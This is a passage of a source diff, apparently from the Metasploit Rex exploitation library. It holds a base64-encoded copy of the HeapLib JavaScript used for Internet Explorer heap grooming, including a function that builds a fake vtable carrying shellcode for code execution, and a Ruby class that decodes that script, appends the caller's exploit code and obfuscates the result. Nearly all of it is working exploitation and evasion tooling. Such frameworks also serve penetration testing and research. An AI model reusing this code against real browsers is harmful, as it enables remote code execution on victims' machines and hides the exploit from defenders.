c21hbGxlciBibG9ja3MgZnJvbSB0aGUNCi8vIGNhY2hlLiBUaGVuIHdlIGFs
|
|
171
|
+
bG9jYXRlIHRoZSBtYXhpbXVtIHNpemUgYmxvY2tzIGFnYWluLCBsZWF2aW5n
|
|
172
|
+
IHRoZSBjYWNoZQ0KLy8gZW1wdHkuDQovLw0KLy8gWW91IG5lZWQgdG8gY2Fs
|
|
173
|
+
bCB0aGlzIGZ1bmN0aW9uIG9uY2UgdG8gYWxsb2NhdGUgdGhlIG1heGltdW0g
|
|
174
|
+
c2l6ZSBibG9ja3MNCi8vIGJlZm9yZSB5b3UgY2FuIHVzZSBpdCB0byBmbHVz
|
|
175
|
+
aCB0aGUgY2FjaGUuDQovLw0KDQpoZWFwTGliLmllLnByb3RvdHlwZS5mbHVz
|
|
176
|
+
aE9sZWF1dDMyID0gZnVuY3Rpb24oKSB7DQoNCiAgICB0aGlzLmRlYnVnKCJG
|
|
177
|
+
bHVzaGluZyB0aGUgT0xFQVVUMzIgY2FjaGUiKTsNCg0KICAgIC8vIEZyZWUg
|
|
178
|
+
dGhlIG1heGltdW0gc2l6ZSBibG9ja3MgYW5kIHB1c2ggb3V0IGFsbCBzbWFs
|
|
179
|
+
bGVyIGJsb2Nrcw0KDQogICAgdGhpcy5mcmVlT2xlYXV0MzIoIm9sZWF1dDMy
|
|
180
|
+
Iik7DQogICAgDQogICAgLy8gQWxsb2NhdGUgdGhlIG1heGltdW0gc2l6ZWQg
|
|
181
|
+
YmxvY2tzIGFnYWluLCBlbXB0eWluZyB0aGUgY2FjaGUNCg0KICAgIGZvciAo
|
|
182
|
+
dmFyIGkgPSAwOyBpIDwgNjsgaSsrKSB7DQogICAgICAgIHRoaXMuYWxsb2NP
|
|
183
|
+
bGVhdXQzMigzMiwgIm9sZWF1dDMyIik7DQogICAgICAgIHRoaXMuYWxsb2NP
|
|
184
|
+
bGVhdXQzMig2NCwgIm9sZWF1dDMyIik7DQogICAgICAgIHRoaXMuYWxsb2NP
|
|
185
|
+
bGVhdXQzMigyNTYsICJvbGVhdXQzMiIpOw0KICAgICAgICB0aGlzLmFsbG9j
|
|
186
|
+
T2xlYXV0MzIoMzI3NjgsICJvbGVhdXQzMiIpOw0KICAgIH0NCn0NCg0KDQov
|
|
187
|
+
Lw0KLy8gQWxsb2NhdGVzIGEgYmxvY2sgb2YgYSBzcGVjaWZpZWQgc2l6ZSB3
|
|
188
|
+
aXRoIHRoZSBzeXN0ZW0gbWVtb3J5IGFsbG9jYXRvci4gQQ0KLy8gY2FsbCB0
|
|
189
|
+
byB0aGlzIGZ1bmN0aW9uIGlzIGVxdWl2YWxlbnQgdG8gYSBjYWxsIHRvIEhl
|
|
190
|
+
YXBBbGxvYygpLiBJZiB0aGUgZmlyc3QNCi8vIGFyZ3VtZW50IGlzIGEgbnVt
|
|
191
|
+
YmVyLCBpdCBzcGVjaWZpZXMgdGhlIHNpemUgb2YgdGhlIG5ldyBibG9jaywg
|
|
192
|
+
d2hpY2ggaXMNCi8vIGZpbGxlZCB3aXRoICJBIiBjaGFyYWN0ZXJzLiBJZiB0
|
|
193
|
+
aGUgYXJndW1lbnQgaXMgYSBzdHJpbmcsIGl0cyBkYXRhIGlzIGNvcGllZA0K
|
|
194
|
+
Ly8gaW50byBhIG5ldyBibG9jayBvZiBzaXplIGFyZy5sZW5ndGggKiAyICsg
|
|
195
|
+
Ni4gSW4gYm90aCBjYXNlcyB0aGUgc2l6ZSBvZiB0aGUNCi8vIG5ldyBibG9j
|
|
196
|
+
ayBtdXN0IGJlIGEgbXVsdGlwbGUgb2YgMTYgYW5kIG5vdCBlcXVhbCB0byAz
|
|
197
|
+
MiwgNjQsIDI1NiBvciAzMjc2OC4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAg
|
|
198
|
+
ICBhcmcgLSBzaXplIG9mIHRoZSBtZW1vcnkgYmxvY2sgaW4gYnl0ZXMsIG9y
|
|
199
|
+
IGEgc3RyaW5nIHRvIHN0cmR1cA0KLy8gICAgdGFnIC0gYSB0YWcgaWRlbnRp
|
|
200
|
+
ZnlpbmcgdGhlIG1lbW9yeSBibG9jayAob3B0aW9uYWwpDQovLw0KDQpoZWFw
|
|
201
|
+
TGliLmllLnByb3RvdHlwZS5hbGxvYyA9IGZ1bmN0aW9uKGFyZywgdGFnKSB7
|
|
202
|
+
DQoNCiAgICB2YXIgc2l6ZTsNCg0KICAgIC8vIENhbGN1bGF0ZSB0aGUgYWxs
|
|
203
|
+
b2NhdGlvbiBzaXplDQogICAgaWYgKHR5cGVvZiBhcmcgPT0gInN0cmluZyIg
|
|
204
|
+
fHwgYXJnIGluc3RhbmNlb2YgU3RyaW5nKQ0KICAgICAgICBzaXplID0gNCAr
|
|
205
|
+
IGFyZy5sZW5ndGgqMiArIDI7ICAgIC8vIGxlbiArIHN0cmluZyBkYXRhICsg
|
|
206
|
+
bnVsbCB0ZXJtaW5hdG9yDQogICAgZWxzZQ0KICAgICAgICBzaXplID0gYXJn
|
|
207
|
+
Ow0KDQogICAgLy8gTWFrZSBzdXJlIHRoYXQgdGhlIHNpemUgaXMgdmFsaWQN
|
|
208
|
+
CiAgICBpZiAoc2l6ZSA9PSAzMiB8fCBzaXplID09IDY0IHx8IHNpemUgPT0g
|
|
209
|
+
MjU2IHx8IHNpemUgPT0gMzI3NjgpDQogICAgICAgIHRocm93ICJBbGxvY2F0
|
|
210
|
+
aW9uIHNpemVzICIgKyBzaXplICsgIiBjYW5ub3QgYmUgZmx1c2hlZCBvdXQg
|
|
211
|
+
b2YgdGhlIE9MRUFVVDMyIGNhY2hlIjsNCg0KICAgIC8vIEFsbG9jYXRlIHRo
|
|
212
|
+
ZSBibG9jayB3aXRoIHRoZSBPTEVBVVQzMiBhbGxvY2F0b3INCiAgICB0aGlz
|
|
213
|
+
LmFsbG9jT2xlYXV0MzIoYXJnLCB0YWcpOw0KfQ0KDQoNCi8vDQovLyBGcmVl
|
|
214
|
+
cyBhbGwgbWVtb3J5IGJsb2NrcyBtYXJrZWQgd2l0aCBhIHNwZWNpZmljIHRh
|
|
215
|
+
ZyB3aXRoIHRoZSBzeXN0ZW0gbWVtb3J5DQovLyBhbGxvY2F0b3IuIEEgY2Fs
|
|
216
|
+
bCB0byB0aGlzIGZ1bmN0aW9uIGlzIGVxdWl2YWxlbnQgdG8gYSBjYWxsIHRv
|
|
217
|
+
IEhlYXBGcmVlKCkuDQovLw0KLy8gQXJndW1lbnRzOg0KLy8gICAgdGFnIC0g
|
|
218
|
+
YSB0YWcgaWRlbnRpZnlpbmcgdGhlIGdyb3VwIG9mIGJsb2NrcyB0byBiZSBm
|
|
219
|
+
cmVlZA0KLy8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUuZnJlZSA9IGZ1bmN0
|
|
220
|
+
aW9uKHRhZykgew0KDQogICAgLy8gRnJlZSB0aGUgYmxvY2tzIHdpdGggdGhl
|
|
221
|
+
IE9MRUFVVDMyIGZyZWUgZnVuY3Rpb24NCiAgICB0aGlzLmZyZWVPbGVhdXQz
|
|
222
|
+
Mih0YWcpOw0KDQogICAgLy8gRmx1c2ggdGhlIE9MRUFVVDMyIGNhY2hlDQog
|
|
223
|
+
ICAgdGhpcy5mbHVzaE9sZWF1dDMyKCk7DQp9DQoNCg0KLy8NCi8vIFJ1bnMg
|
|
224
|
+
dGhlIGdhcmJhZ2UgY29sbGVjdG9yIGFuZCBmbHVzaGVzIHRoZSBPTEVBVVQz
|
|
225
|
+
MiBjYWNoZS4gQ2FsbCB0aGlzDQovLyBmdW5jdGlvbiBiZWZvcmUgYmVmb3Jl
|
|
226
|
+
IHVzaW5nIGFsbG9jKCkgYW5kIGZyZWUoKS4NCi8vDQoNCmhlYXBMaWIuaWUu
|
|
227
|
+
cHJvdG90eXBlLmdjID0gZnVuY3Rpb24oKSB7DQoNCiAgICB0aGlzLmRlYnVn
|
|
228
|
+
KCJSdW5uaW5nIHRoZSBnYXJiYWdlIGNvbGxlY3RvciIpOw0KICAgIENvbGxl
|
|
229
|
+
Y3RHYXJiYWdlKCk7DQoNCiAgICB0aGlzLmZsdXNoT2xlYXV0MzIoKTsNCn0N
|
|
230
|
+
Cg0KDQovLw0KLy8gQWRkcyBibG9ja3Mgb2YgdGhlIHNwZWNpZmllZCBzaXpl
|
|
231
|
+
IHRvIHRoZSBmcmVlIGxpc3QgYW5kIG1ha2VzIHN1cmUgdGhleSBhcmUNCi8v
|
|
232
|
+
IG5vdCBjb2FsZXNjZWQuIFRoZSBoZWFwIG11c3QgYmUgZGVmcmFnbWVudGVk
|
|
233
|
+
IGJlZm9yZSBjYWxsaW5nIHRoaXMgZnVuY3Rpb24uDQovLyBJZiB0aGUgc2l6
|
|
234
|
+
ZSBvZiB0aGUgbWVtb3J5IGJsb2NrcyBpcyBsZXNzIHRoYW4gMTAyNCwgeW91
|
|
235
|
+
IGhhdmUgdG8gbWFrZSBzdXJlDQovLyB0aGF0IHRoZSBsb29rYXNpZGUgaXMg
|
|
236
|
+
ZnVsbC4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAgICBhcmcgICAgLSBzaXpl
|
|
237
|
+
IG9mIHRoZSBuZXcgYmxvY2sgaW4gYnl0ZXMsIG9yIGEgc3RyaW5nIHRvIHN0
|
|
238
|
+
cmR1cA0KLy8gICAgY291bnQgIC0gaG93IG1hbnkgZnJlZSBibG9ja3MgdG8g
|
|
239
|
+
YWRkIHRvIHRoZSBsaXN0IChkZWZhdWx0cyB0byAxKQ0KLy8NCg0KaGVhcExp
|
|
240
|
+
Yi5pZS5wcm90b3R5cGUuZnJlZUxpc3QgPSBmdW5jdGlvbihhcmcsIGNvdW50
|
|
241
|
+
KSB7DQoNCiAgICB2YXIgY291bnQgPSAoY291bnQgPyBjb3VudCA6IDEpOw0K
|
|
242
|
+
DQogICAgZm9yICh2YXIgaSA9IDA7IGkgPCBjb3VudDsgaSsrKSB7DQogICAg
|
|
243
|
+
ICAgIHRoaXMuYWxsb2MoYXJnKTsNCiAgICAgICAgdGhpcy5hbGxvYyhhcmcs
|
|
244
|
+
ICJmcmVlTGlzdCIpOw0KICAgIH0NCiAgICB0aGlzLmFsbG9jKGFyZyk7DQoN
|
|
245
|
+
CiAgICB0aGlzLmZyZWUoImZyZWVMaXN0Iik7DQp9DQoNCg0KLy8NCi8vIEFk
|
|
246
|
+
ZCBibG9ja3Mgb2YgdGhlIHNwZWNpZmllZCBzaXplIHRvIHRoZSBsb29rYXNp
|
|
247
|
+
ZGUuIFRoZSBsb29rYXNpZGUgbXVzdCBiZQ0KLy8gZW1wdHkgYmVmb3JlIGNh
|
|
248
|
+
bGxpbmcgdGhpcyBmdW5jdGlvbi4NCi8vDQovLyBBcmd1bWVudHM6DQovLyAg
|
|
249
|
+
ICBhcmcgICAgLSBzaXplIG9mIHRoZSBuZXcgYmxvY2sgaW4gYnl0ZXMsIG9y
|
|
250
|
+
IGEgc3RyaW5nIHRvIHN0cmR1cA0KLy8gICAgY291bnQgIC0gaG93IG1hbnkg
|
|
251
|
+
YmxvY2tzIHRvIGFkZCB0byB0aGUgbG9va2FzaWRlIChkZWZhdWx0cyB0byAx
|
|
252
|
+
KQ0KLy8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUubG9va2FzaWRlID0gZnVu
|
|
253
|
+
Y3Rpb24oYXJnLCBjb3VudCkgew0KDQogICAgdmFyIHNpemU7DQoNCiAgICAv
|
|
254
|
+
LyBDYWxjdWxhdGUgdGhlIGFsbG9jYXRpb24gc2l6ZQ0KICAgIGlmICh0eXBl
|
|
255
|
+
b2YgYXJnID09ICJzdHJpbmciIHx8IGFyZyBpbnN0YW5jZW9mIFN0cmluZykN
|
|
256
|
+
CiAgICAgICAgc2l6ZSA9IDQgKyBhcmcubGVuZ3RoKjIgKyAyOyAgICAvLyBs
|
|
257
|
+
ZW4gKyBzdHJpbmcgZGF0YSArIG51bGwgdGVybWluYXRvcg0KICAgIGVsc2UN
|
|
258
|
+
CiAgICAgICAgc2l6ZSA9IGFyZzsNCg0KICAgIC8vIE1ha2Ugc3VyZSB0aGF0
|
|
259
|
+
IHRoZSBzaXplIGlzIHZhbGlkDQogICAgaWYgKChzaXplICYgMHhmKSAhPSAw
|
|
260
|
+
KQ0KICAgICAgICB0aHJvdyAiQWxsb2NhdGlvbiBzaXplICIgKyBzaXplICsg
|
|
261
|
+
IiBtdXN0IGJlIGEgbXVsdGlwbGUgb2YgMTYiOw0KDQogICAgaWYgKHNpemUr
|
|
262
|
+
OCA+PSAxMDI0KQ0KICAgICAgICB0aHJvdygiTWF4aW11bSBsb29rYXNpZGUg
|
|
263
|
+
YmxvY2sgc2l6ZSBpcyAxMDA4IGJ5dGVzIik7DQoNCiAgICB2YXIgY291bnQg
|
|
264
|
+
PSAoY291bnQgPyBjb3VudCA6IDEpOw0KDQogICAgZm9yICh2YXIgaSA9IDA7
|
|
265
|
+
IGkgPCBjb3VudDsgaSsrKQ0KICAgICAgICB0aGlzLmFsbG9jKGFyZywgImxv
|
|
266
|
+
b2thc2lkZSIpOw0KDQogICAgdGhpcy5mcmVlKCJsb29rYXNpZGUiKTsNCn0N
|
|
267
|
+
Cg0KDQovLw0KLy8gUmV0dXJuIHRoZSBhZGRyZXNzIG9mIHRoZSBoZWFkIG9m
|
|
268
|
+
IHRoZSBsb29rYXNpZGUgbGlua2VkIGxpc3QgZm9yIGJsb2NrcyBvZiBhDQov
|
|
269
|
+
LyBzcGVjaWZpZWQgc2l6ZS4gVXNlcyB0aGUgaGVhcEJhc2UgcGFyYW1ldGVy
|
|
270
|
+
IGZyb20gdGhlIGhlYXBMaWIuaWUgY29uc3RydWN0b3IuDQovLw0KLy8gQXJn
|
|
271
|
+
dW1lbnRzOg0KLy8gICAgYXJnIC0gc2l6ZSBvZiB0aGUgbmV3IGJsb2NrIGlu
|
|
272
|
+
IGJ5dGVzLCBvciBhIHN0cmluZyB0byBzdHJkdXANCi8vDQoNCmhlYXBMaWIu
|
|
273
|
+
aWUucHJvdG90eXBlLmxvb2thc2lkZUFkZHIgPSBmdW5jdGlvbihhcmcpDQp7
|
|
274
|
+
DQogICAgdmFyIHNpemU7DQoNCiAgICAvLyBDYWxjdWxhdGUgdGhlIGFsbG9j
|
|
275
|
+
YXRpb24gc2l6ZQ0KICAgIGlmICh0eXBlb2YgYXJnID09ICJzdHJpbmciIHx8
|
|
276
|
+
IGFyZyBpbnN0YW5jZW9mIFN0cmluZykNCiAgICAgICAgc2l6ZSA9IDQgKyBh
|
|
277
|
+
cmcubGVuZ3RoKjIgKyAyOyAgICAvLyBsZW4gKyBzdHJpbmcgZGF0YSArIG51
|
|
278
|
+
bGwgdGVybWluYXRvcg0KICAgIGVsc2UNCiAgICAgICAgc2l6ZSA9IGFyZzsN
|
|
279
|
+
Cg0KICAgIC8vIE1ha2Ugc3VyZSB0aGF0IHRoZSBzaXplIGlzIHZhbGlkDQog
|
|
280
|
+
ICAgaWYgKChzaXplICYgMHhmKSAhPSAwKQ0KICAgICAgICB0aHJvdyAiQWxs
|
|
281
|
+
b2NhdGlvbiBzaXplICIgKyBzaXplICsgIiBtdXN0IGJlIGEgbXVsdGlwbGUg
|
|
282
|
+
b2YgMTYiOw0KDQogICAgaWYgKHNpemUrOCA+PSAxMDI0KQ0KICAgICAgICB0
|
|
283
|
+
aHJvdygiTWF4aW11bSBsb29rYXNpZGUgYmxvY2sgc2l6ZSBpcyAxMDA4IGJ5
|
|
284
|
+
dGVzIik7DQoNCiAgICAvLyBUaGUgbG9va2FoZWFkIGFycmF5IHN0YXJ0cyBh
|
|
285
|
+
dCBoZWFwQmFzZSArIDB4Njg4LiBJdCBjb250YWlucyBhIDQ4IGJ5dGUNCiAg
|
|
286
|
+
ICAvLyBzdHJ1Y3R1cmUgZm9yIGVhY2ggYmxvY2sgc2l6ZSArIGhlYWRlciBz
|
|
287
|
+
aXplIGluIDggYnl0ZSBpbmNyZW1lbnRzLg0KDQogICAgcmV0dXJuIHRoaXMu
|
|
288
|
+
aGVhcEJhc2UgKyAweDY4OCArICgoc2l6ZSs4KS84KSo0ODsNCn0NCg0KDQov
|
|
289
|
+
Lw0KLy8gUmV0dXJucyBhIGZha2UgdnRhYmxlIHRoYXQgY29udGFpbnMgc2hl
|
|
290
|
+
bGxjb2RlLiBUaGUgY2FsbGVyIHNob3VsZCBmcmVlIHRoZQ0KLy8gdnRhYmxl
|
|
291
|
+
IHRvIHRoZSBsb29rYXNpZGUgYW5kIHVzZSB0aGUgYWRkcmVzcyBvZiB0aGUg
|
|
292
|
+
bG9va2FzaWRlIGhlYWQgYXMgYW4NCi8vIG9iamVjdCBwb2ludGVyLiBXaGVu
|
|
293
|
+
IHRoZSB2dGFibGUgaXMgdXNlZCwgdGhlIGFkZHJlc3Mgb2YgdGhlIG9iamVj
|
|
294
|
+
dCBtdXN0IGJlDQovLyBpbiBlYXggYW5kIHRoZSBwb2ludGVyIHRvIHRoZSB2
|
|
295
|
+
dGFibGUgbXVzdCBiZSBpbiBlY3guIEFueSB2aXJ0dWFsIGZ1bmN0aW9uDQov
|
|
296
|
+
LyBjYWxsIHRocm91Z2ggdGhlIHZ0YWJsZSBmcm9tIGVjeCs4IHRvIGVjeCsw
|
|
297
|
+
eDgwIHdpbGwgcmVzdWx0IGluIHNoZWxsY29kZQ0KLy8gZXhlY3V0aW9uLiBU
|
|
298
|
+
aGlzIGZ1bmN0aW9uIHVzZXMgdGhlIGhlYXAuDQovLw0KLy8gQXJndW1lbnRz
|
|
299
|
+
Og0KLy8gICAgc2hlbGxjb2RlIC0gc2hlbGxjb2RlIHN0cmluZw0KLy8gICAg
|
|
300
|
+
am1wZWN4ICAgIC0gYWRkcmVzcyBvZiBhIGptcCBlY3ggb3IgZXF1aXZhbGVu
|
|
301
|
+
dCBpbnN0cnVjdGlvbg0KLy8gICAgc2l6ZSAgICAgIC0gc2l6ZSBvZiB0aGUg
|
|
302
|
+
dnRhYmxlIHRvIGdlbmVyYXRlIChkZWZhdWx0cyB0byAxMDA4IGJ5dGVzKQ0K
|
|
303
|
+
Ly8NCg0KaGVhcExpYi5pZS5wcm90b3R5cGUudnRhYmxlID0gZnVuY3Rpb24o
|
|
304
|
+
c2hlbGxjb2RlLCBqbXBlY3gsIHNpemUpIHsNCg0KICAgIHZhciBzaXplID0g
|
|
305
|
+
KHNpemUgPyBzaXplIDogMTAwOCk7DQoNCiAgICAvLyBNYWtlIHN1cmUgdGhl
|
|
306
|
+
IHNpemUgaXMgdmFsaWQNCiAgICBpZiAoKHNpemUgJiAweGYpICE9IDApDQog
|
|
307
|
+
ICAgICAgIHRocm93ICJWdGFibGUgc2l6ZSAiICsgc2l6ZSArICIgbXVzdCBi
|
|
308
|
+
ZSBhIG11bHRpcGxlIG9mIDE2IjsNCg0KICAgIGlmIChzaGVsbGNvZGUubGVu
|
|
309
|
+
Z3RoKjIgPiBzaXplLTEzOCkNCiAgICAgICAgdGhyb3coIk1heGltdW0gc2hl
|
|
310
|
+
bGxjb2RlIGxlbmd0aCBpcyAiICsgKHNpemUtMTM4KSArICIgYnl0ZXMiKTsN
|
|
311
|
+
Cg0KICAgIC8vIEJ1aWxkIHRoZSBmYWtlIHZ0YWJsZSB0aGF0IHdpbGwgZ28g
|
|
312
|
+
b24gdGhlIGxvb2thc2lkZSBsaXN0DQogICAgLy8NCiAgICAvLyBsb29rYXNp
|
|
313
|
+
ZGUgcHRyICBqbXAgKzEyNCAgYWRkciBvZiBqbXAgZWN4ICBzdWIgW2VheF0s
|
|
314
|
+
IGFsKjIgIHNoZWxsY29kZSAgICAgICBudWxsDQogICAgLy8gNCBieXRlcyAg
|
|
315
|
+
ICAgICAgNCBieXRlcyAgIDEyNCBieXRlcyAgICAgICAgNCBieXRlcyAgICAg
|
|
316
|
+
ICAgICBzaXplLTEzOCBieXRlcyAgMiBieXRlcw0KDQogICAgdmFyIHZ0YWJs
|
|
317
|
+
ZSA9IHVuZXNjYXBlKCIldTkwOTAldTdjZWIiKSAgIC8vIG5vcCwgbm9wLCBq
|
|
318
|
+
bXAgKyAxMjQNCg0KICAgIGZvciAodmFyIGkgPSAwOyBpIDwgMTI0LzQ7IGkr
|
|
319
|
+
KykNCiAgICAgICAgdnRhYmxlICs9IHRoaXMuYWRkcihqbXBlY3gpOw0KDQog
|
|
320
|
+
ICAgLy8gSWYgdGhlIHZ0YWJsZSBpcyB0aGUgb25seSBlbnRyeSBvbiB0aGUg
|
|
321
|
+
bG9va2FzaWRlLCB0aGUgZmlyc3QgNCBieXRlcyB3aWxsDQogICAgLy8gYmUg
|
|
322
|
+
MDAgMDAgMDAgMDAsIHdoaWNoIGRpc2Fzc2VtYmxlcyBhcyB0d28gYWRkIFtl
|
|
323
|
+
YXhdLCBhbCBpbnN0cnVjdGlvbnMuDQogICAgLy8gVGhlIGptcCBlY3ggdHJh
|
|
324
|
+
bXBvbGluZSB3aWxsIGp1bXAgYmFjayB0byB0aGUgYmVnaW5uaW5nIG9mIHRo
|
|
325
|
+
ZSB2dGFibGUgYW5kDQogICAgLy8gZXhlY3V0ZSB0aGUgYWRkIFtlYXhdLCBh
|
|
326
|
+
bCBpbnN0cnVjdGlvbnMuIFdlIG5lZWQgdG8gdXNlIHR3byBzdWIgW2VheF0s
|
|
327
|
+
IGFsDQogICAgLy8gaW5zdHJ1Y3Rpb25zIHRvIGZpeCB0aGUgaGVhcC4NCg0K
|
|
328
|
+
ICAgIHZ0YWJsZSArPSB1bmVzY2FwZSgiJXUwMDI4JXUwMDI4IikgKyAgICAv
|
|
329
|
+
LyB0d28gc3ViIFtlYXhdLCBhbCBpbnN0cnVjdGlvbnMNCiAgICAgICAgICAg
|
|
330
|
+
ICAgc2hlbGxjb2RlICsgaGVhcC5wYWRkaW5nKChzaXplLTEzOCkvMiAtIHNo
|
|
331
|
+
ZWxsY29kZS5sZW5ndGgpOw0KDQogICAgcmV0dXJuIHZ0YWJsZTsNCn0NCg==
|
|
@@ -0,0 +1,107 @@
|
|
|
1
|
+
# -*- coding: binary -*-
|
|
2
|
+
require 'rex/text'
|
|
3
|
+
require 'rex/exploitation/obfuscatejs'
|
|
4
|
+
require 'rex/exploitation/jsobfu'
|
|
5
|
+
|
|
6
|
+
module Rex
|
|
7
|
+
module Exploitation
|
|
8
|
+
|
|
9
|
+
#
|
|
10
|
+
# Encapsulates the generation of the Alexander Sotirov's HeapLib javascript
|
|
11
|
+
# stub
|
|
12
|
+
#
|
|
13
|
+
class HeapLib
|
|
14
|
+
|
|
15
|
+
#
|
|
16
|
+
# The source file to load the javascript from
|
|
17
|
+
#
|
|
18
|
+
JavascriptFile = File.join(File.dirname(__FILE__), "heaplib.js.b64")
|
|
19
|
+
|
|
20
|
+
#
|
|
21
|
+
# The list of symbols found in the file. This is used to dynamically
|
|
22
|
+
# replace contents.
|
|
23
|
+
#
|
|
24
|
+
SymbolNames =
|
|
25
|
+
{
|
|
26
|
+
"Methods" =>
|
|
27
|
+
[
|
|
28
|
+
"vtable",
|
|
29
|
+
"lookasideAddr",
|
|
30
|
+
"lookaside",
|
|
31
|
+
"freeList",
|
|
32
|
+
"gc",
|
|
33
|
+
"flushOleaut32",
|
|
34
|
+
"freeOleaut32",
|
|
35
|
+
"allocOleaut32",
|
|
36
|
+
"free",
|
|
37
|
+
"alloc",
|
|
38
|
+
"addr",
|
|
39
|
+
"hex",
|
|
40
|
+
"round",
|
|
41
|
+
"paddingStr",
|
|
42
|
+
"padding",
|
|
43
|
+
"debugBreak",
|
|
44
|
+
"debugHeap",
|
|
45
|
+
"debug",
|
|
46
|
+
],
|
|
47
|
+
"Classes" =>
|
|
48
|
+
[
|
|
49
|
+
{ 'Namespace' => "heapLib", 'Class' => "ie" }
|
|
50
|
+
],
|
|
51
|
+
"Namespaces" =>
|
|
52
|
+
[
|
|
53
|
+
"heapLib"
|
|
54
|
+
]
|
|
55
|
+
}
|
|
56
|
+
|
|
57
|
+
#
|
|
58
|
+
# Initializes the heap library javascript
|
|
59
|
+
#
|
|
60
|
+
def initialize(custom_js = '', opts = {})
|
|
61
|
+
load_js(custom_js, opts)
|
|
62
|
+
end
|
|
63
|
+
|
|
64
|
+
#
|
|
65
|
+
# Return the replaced version of the javascript
|
|
66
|
+
#
|
|
67
|
+
def to_s
|
|
68
|
+
@js
|
|
69
|
+
end
|
|
70
|
+
|
|
71
|
+
protected
|
|
72
|
+
|
|
73
|
+
#
|
|
74
|
+
# Loads the raw javascript from the source file and strips out comments
|
|
75
|
+
#
|
|
76
|
+
def load_js(custom_js, opts = {})
|
|
77
|
+
|
|
78
|
+
# Grab the complete javascript
|
|
79
|
+
File.open(JavascriptFile) do |f|
|
|
80
|
+
@js = f.read
|
|
81
|
+
end
|
|
82
|
+
|
|
83
|
+
# Decode the text
|
|
84
|
+
@js = Rex::Text.decode_base64(@js)
|
|
85
|
+
|
|
86
|
+
# Append the real code
|
|
87
|
+
@js += "\n" + custom_js
|
|
88
|
+
|
|
89
|
+
if opts[:newobfu]
|
|
90
|
+
# Obfuscate the javascript using the new lexer method
|
|
91
|
+
js_obfu = JSObfu.new(@js)
|
|
92
|
+
js_obfu.obfuscate
|
|
93
|
+
@js = js_obfu.to_s
|
|
94
|
+
return @js
|
|
95
|
+
elsif opts[:noobfu]
|
|
96
|
+
# Do not obfuscate, let the exploit do the work (useful to avoid double obfuscation)
|
|
97
|
+
return @js
|
|
98
|
+
end
|
|
99
|
+
|
|
100
|
+
# Default to the old method
|
|
101
|
+
# Obfuscate the javascript using the old method
|
|
102
|
+
@js = ObfuscateJS.obfuscate(@js, 'Symbols' => SymbolNames)
|
|
103
|
+
end
|
|
104
|
+
end
|
|
105
|
+
|
|
106
|
+
end
|
|
107
|
+
end
|